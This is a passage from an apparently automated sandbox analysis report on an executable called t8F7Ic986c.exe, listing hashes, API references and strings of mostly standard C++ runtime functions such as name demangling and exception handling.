                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2395640692-1018135373
                                                    • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                    • Instruction ID: 942f6b07ac4a1daa3224efcf2cd10f6b3d47a6dee52df6b7e60e408bcc17dfb8
                                                    • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                    • Instruction Fuzzy Hash: DD51B063B196228ADB14CB15E84467D37A6EBC4B9CF58813CDA4A93788DFBDE841C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                    • Instruction ID: 3c14d8127056432f41124ee53c90e737feeae5ad7fad9d369909fc37c72f13f7
                                                    • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                    • Instruction Fuzzy Hash: C0619432908BC585EB20DB15E8403AAB7A0FBC4798F08422DEB9D57B55DFBCE194CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                    • Instruction ID: fc25f36874ac82e5dd5ab85346afc6a64d1a883e0031156948d02aaf10905d5b
                                                    • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                    • Instruction Fuzzy Hash: 8F518F3290866286EB64CB1198443A97790FB95B8CF1C413EDE8DA7BC5CFBCE461C705
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                    • Instruction ID: fd621e8eea7fff6d0b95926d565b9a533eeb75abb55fa07af4f7e9ca9e979523
                                                    • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                    • Instruction Fuzzy Hash: CD31767262869281E720DB10F8516DA6364FFC47C8F84513EE78DA7A99DF7CD605CB40
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • CreateFileW.KERNEL32(00000000,?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43A8
                                                    • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43C8
                                                    • CloseHandle.KERNEL32(?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                    • String ID: \\?\
                                                    • API String ID: 2226452419-4282027825
                                                    • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                    • Instruction ID: 5c60f338cc06f4c95d085e19e78e5ae37600b3bb0d81218b81875bf9327b330d
                                                    • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                    • Instruction Fuzzy Hash: 0E21E172B1866145E720DB21FC407AA6251EBC87D8F480239DF4DA3A94DFBCE549CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                    • Instruction ID: f5116993726ccefbdaff86af03f817a587ed6b232122ef8f495c24fd00cf2da9
                                                    • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                    • Instruction Fuzzy Hash: BCD1EF72B08A9299E711CF69D8402EC3BB9FB4479CB184239DE5DE7B99DE78D406C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                    • Instruction ID: ecd5f9050075c7e9eaf7bfb47e2cdff5a967b214d5427e8405fb9b83ce7b03d8
                                                    • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                    • Instruction Fuzzy Hash: 06518022E086628AF714DFB0DC503BD33B1AB49B9CF189539DE0DA768ADFB8D5458350
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                    • Instruction ID: 74cdf1ea60d4995b67125f4fa29445a35be23e980b965b7ed723d3fb7ed3a19f
                                                    • Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                    • Instruction Fuzzy Hash: 7E11E521E1816343FB549B6AFD442BE6291EFC8BC8F5C903CDA49A6B9ACDACD4C54204
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EE9DFA
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF652EDC335), ref: 00007FF652EE9E18
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\t8F7Ic986c.exe
                                                    • API String ID: 3580290477-3003899231
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                    • API String ID: 2943138195-1201493255
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: `anonymous namespace'
                                                    • API String ID: 2943138195-3062148218
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                    • API String ID: 2943138195-4167119577
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3436797354-393685449
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                    • API String ID: 0-3207858774
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                    • API String ID: 179159573-1464470183
                                                    APIs
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 211107550-393685449
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                    • API String ID: 2943138195-2239912363
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                    • API String ID: 1852475696-928371585
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: {for
                                                    • API String ID: 179159573-864106941
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B692F
                                                    • GetLastError.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B693D
                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B6956
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B6968
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B69AE
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B69BA
                                                    Strings
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 916704608-2084034818
                                                    APIs
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    APIs
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: FileHeader_local_unwind
                                                    • String ID: MOC$RCC$csm$csm
                                                    • API String ID: 2627209546-1441736206
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: NameName::atol
                                                    • String ID: `template-parameter$void
                                                    • API String ID: 2130343216-4057429177
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                    • API String ID: 2943138195-2211150622
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: char $int $long $short $unsigned
                                                    • API String ID: 2943138195-3894466517
                                                    APIs
                                                    Similarity
                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                    • String ID:
                                                    • API String ID: 3741236498-0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                    • API String ID: 2943138195-757766384
                                                    • Opcode ID: dd51cba4cb05916af9b660d2e8855c61f9d1249a1d68a44b5469808a2cb9767c
                                                    • Instruction ID: f6c1c257b680a7a915c009a60e0c8b8c7ed92f6561bb97efbc9293a2f452e5b4
                                                    • Opcode Fuzzy Hash: dd51cba4cb05916af9b660d2e8855c61f9d1249a1d68a44b5469808a2cb9767c
                                                    • Instruction Fuzzy Hash: 84715F71A08F5288FB248F26D8D15BC66A4BB067A4F8445B5EA5D03BB9DF3CE258C340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: 7ad9f89f87b67e87ef2f2f7918b4673cbfa1f5ae22a53a6e1dcb14bee6498f23
                                                    • Instruction ID: e1586dad7eea6419691190e75f0493237ba719e2752b16b247987f137b29d093
                                                    • Opcode Fuzzy Hash: 7ad9f89f87b67e87ef2f2f7918b4673cbfa1f5ae22a53a6e1dcb14bee6498f23
                                                    • Instruction Fuzzy Hash: 99614872A08B858AE724CF66D4803AD77A0FB49B98F144275EF8D17B69DF78E059C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: NameName::$Name::operator+
                                                    • String ID:
                                                    • API String ID: 826178784-0
                                                    • Opcode ID: 7a215f6e1ecc099ddad05745ac6fc735a17c609b89ce59e1dc00ffa76962c259
                                                    • Instruction ID: 16321694352b6b813a2529aa1e96012e3ab791f36e2f2a4f4f8f41208d2ca11b
                                                    • Opcode Fuzzy Hash: 7a215f6e1ecc099ddad05745ac6fc735a17c609b89ce59e1dc00ffa76962c259
                                                    • Instruction Fuzzy Hash: 11415B32A08E5699EB10DB62D8C05B877A4BB56BA0B9840B6FE4D537B5DF38E459C300
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B41C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
